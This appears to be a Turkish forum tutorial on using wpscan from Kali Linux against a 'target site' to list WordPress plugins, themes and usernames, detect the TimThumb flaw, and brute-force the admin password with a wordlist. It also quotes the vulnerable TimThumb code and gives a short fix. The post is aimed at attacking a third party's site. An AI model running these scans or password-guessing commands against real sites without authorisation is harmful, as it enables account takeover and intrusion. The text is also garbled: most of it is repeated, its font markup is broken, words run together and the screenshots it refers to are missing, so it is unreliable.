[FONT=Courier New, Courier, mono]Merhabalar, bu konumuzda wpscan ile Wordpress sitelerindeki açıkları tarayacağız.
Konuyu resimli anlatmayı tercih ettim hiç bilgisi olmayan arkadaşlarımızda anlayabilsin diye başlayalım
[/FONT]
[FONT=Courier New, Courier, mono]Kali Linux >Web Applications > Web Vulnerability Scanners>wpscanyolunu izleyerek komut penceremizi çalıştıralım.
[/FONT]
[FONT=Courier New, Courier, mono]wpscan ./wpscan.rb --url www.hedefsite.orgsitenin versiyon,tema,plugin bilgilerini verir.
[/FONT]
[FONT=Times New Roman, Times, serif]Plugin Açıkları Tarama[/FONT]
[FONT=Courier New, Courier, mono]wpscan ./wpscan.rb --url www.hedefsite.org --enumerate p Hedef sitedeki
pluginleri tarar ve Açıklarını verir.
[/FONT]
[FONT=Courier New, Courier, mono]Tarama tamamlandıktan sonra sonuca bakıyoruz.
[FONT=Arial, Helvetica, sans-serif]Açık tesbit edilmeyen pluginler.[/FONT]
[FONT=Arial, Helvetica, sans-serif]Açığı tesbit edilen pluginler .[/FONT]
[FONT=Times New Roman, Times, serif]Kullanıcı Adları Tarama
[/FONT]
[FONT=Courier New, Courier, mono]wpscan ./wpscan.rb --url www.hedefsite.org --enumerate uBu komutumuz ile hedef sitedeki users yani kullanıcı adlarını çekiyoruz.
[/FONT]
[FONT=Times New Roman, Times, serif]Tema Açıkları Tarama[/FONT]
[FONT=Courier New, Courier, mono]Sırdaki komutumuz[/FONT][FONT=Courier New, Courier, mono]wpscan ./wpscan.rb --url www.hedefsite.org --enumerate t
Bu komut ile hedef sitedeki tema açıklarını tesbit ederiz.[/FONT]
[FONT=Times New Roman, Times, serif]Timthumb Açığı Tarama[/FONT]
[FONT=Courier New, Courier, mono]Önce timthumb açığından bahsedeyim kısaca wordpress tema ve eklentilerindeki resimleri boyutlandırmaya yarıyan timthumb.php dosyası çok kullanışlı olduğu için birçok site tarafından kullanılır.[/FONT]
[FONT=Courier New, Courier, mono]timthumb.php dosyasý içerisinde bulunan aşağıdaki kodlar flickr,picasa,blogger,wordpress vb. sitelerden resim çekebilmek için konulmuştur.İşte bu kod satırı kullanıldığında hedef site için büyük tehlike oluşturur.
[/FONT]
[FONT=Courier New, Courier, mono]?
$allowedSites = array (
flickr.com,
picasa.com,
blogger.com,
wordpress.com,
img.youtube.com,
upload.wikimedia.org,
photobucket.com,
);[/FONT]
[FONT=Courier New, Courier, mono][FONT=Arial, Helvetica, sans-serif]Not:[/FONT]Açığı Kapatmak İçintimthumb.phpdosyası içindeki $allowedSites = array ( kısmı $allowedSites = array ( ); olarak düzeltildiğinde başka sitelere yazma izni kapanmış olur. Tüm dosya içinde düzeltilmesi gerekir.
[FONT=Courier New, Courier, mono]Şimdi işlemimize devam edelim timthumb açığını hedef site üzerinde taratıp mevcut olup olmadığına bakalım.[/FONT]
[FONT=Courier New, Courier, mono]wpscan ./wpscan.rb --url www.hedefsite.org --enumerate tt komutu ile taratıyoruz.[/FONT]
[FONT=Courier New, Courier, mono]Hedef site üzerinde timthumb açığı mevcut.
[FONT=Times New Roman, Times, serif]Tesbit Edilen Kullanıcı Adı ile Brute Force Attack
[/FONT]
[FONT=Courier New, Courier, mono]wpscan ./wpscan.rb --url www.hedefsite.org --wordlist wrdlst.txt --username adminKomutu ile hedef sitede tesbit ettiğimiz kullanıcı adının şifresini brute force attackile kırmayı dener ve bize sonucu bildirir.
[/FONT]
[FONT=Courier New, Courier, mono]Sonucu bize aşağıdaki gibi bildirir.[/FONT]
[/FONT][/FONT][/FONT]
Konuyu resimli anlatmayı tercih ettim hiç bilgisi olmayan arkadaşlarımızda anlayabilsin diye başlayalım
[/FONT]
[FONT=Courier New, Courier, mono]Kali Linux >Web Applications > Web Vulnerability Scanners>wpscanyolunu izleyerek komut penceremizi çalıştıralım.
[/FONT]
[FONT=Courier New, Courier, mono]wpscan ./wpscan.rb --url www.hedefsite.orgsitenin versiyon,tema,plugin bilgilerini verir.
[/FONT]
[FONT=Times New Roman, Times, serif]Plugin Açıkları Tarama[/FONT]
[FONT=Courier New, Courier, mono]wpscan ./wpscan.rb --url www.hedefsite.org --enumerate p Hedef sitedeki
pluginleri tarar ve Açıklarını verir.
[/FONT]
[FONT=Courier New, Courier, mono]Tarama tamamlandıktan sonra sonuca bakıyoruz.
[FONT=Arial, Helvetica, sans-serif]Açık tesbit edilmeyen pluginler.[/FONT]
[FONT=Arial, Helvetica, sans-serif]Açığı tesbit edilen pluginler .[/FONT]
[FONT=Times New Roman, Times, serif]Kullanıcı Adları Tarama
[/FONT]
[FONT=Courier New, Courier, mono]wpscan ./wpscan.rb --url www.hedefsite.org --enumerate uBu komutumuz ile hedef sitedeki users yani kullanıcı adlarını çekiyoruz.
[/FONT]
[FONT=Times New Roman, Times, serif]Tema Açıkları Tarama[/FONT]
[FONT=Courier New, Courier, mono]Sırdaki komutumuz[/FONT][FONT=Courier New, Courier, mono]wpscan ./wpscan.rb --url www.hedefsite.org --enumerate t
Bu komut ile hedef sitedeki tema açıklarını tesbit ederiz.[/FONT]
[FONT=Times New Roman, Times, serif]Timthumb Açığı Tarama[/FONT]
[FONT=Courier New, Courier, mono]Önce timthumb açığından bahsedeyim kısaca wordpress tema ve eklentilerindeki resimleri boyutlandırmaya yarıyan timthumb.php dosyası çok kullanışlı olduğu için birçok site tarafından kullanılır.[/FONT]
[FONT=Courier New, Courier, mono]timthumb.php dosyasý içerisinde bulunan aşağıdaki kodlar flickr,picasa,blogger,wordpress vb. sitelerden resim çekebilmek için konulmuştur.İşte bu kod satırı kullanıldığında hedef site için büyük tehlike oluşturur.
[/FONT]
[FONT=Courier New, Courier, mono]?
$allowedSites = array (
flickr.com,
picasa.com,
blogger.com,
wordpress.com,
img.youtube.com,
upload.wikimedia.org,
photobucket.com,
);[/FONT]
[FONT=Courier New, Courier, mono][FONT=Arial, Helvetica, sans-serif]Not:[/FONT]Açığı Kapatmak İçintimthumb.phpdosyası içindeki $allowedSites = array ( kısmı $allowedSites = array ( ); olarak düzeltildiğinde başka sitelere yazma izni kapanmış olur. Tüm dosya içinde düzeltilmesi gerekir.
[FONT=Courier New, Courier, mono]Şimdi işlemimize devam edelim timthumb açığını hedef site üzerinde taratıp mevcut olup olmadığına bakalım.[/FONT]
[FONT=Courier New, Courier, mono]wpscan ./wpscan.rb --url www.hedefsite.org --enumerate tt komutu ile taratıyoruz.[/FONT]
[FONT=Courier New, Courier, mono]Hedef site üzerinde timthumb açığı mevcut.
[FONT=Times New Roman, Times, serif]Tesbit Edilen Kullanıcı Adı ile Brute Force Attack
[/FONT]
[FONT=Courier New, Courier, mono]wpscan ./wpscan.rb --url www.hedefsite.org --wordlist wrdlst.txt --username adminKomutu ile hedef sitede tesbit ettiğimiz kullanıcı adının şifresini brute force attackile kırmayı dener ve bize sonucu bildirir.
[/FONT]
[FONT=Courier New, Courier, mono]Sonucu bize aşağıdaki gibi bildirir.[/FONT]
Son düzenleme: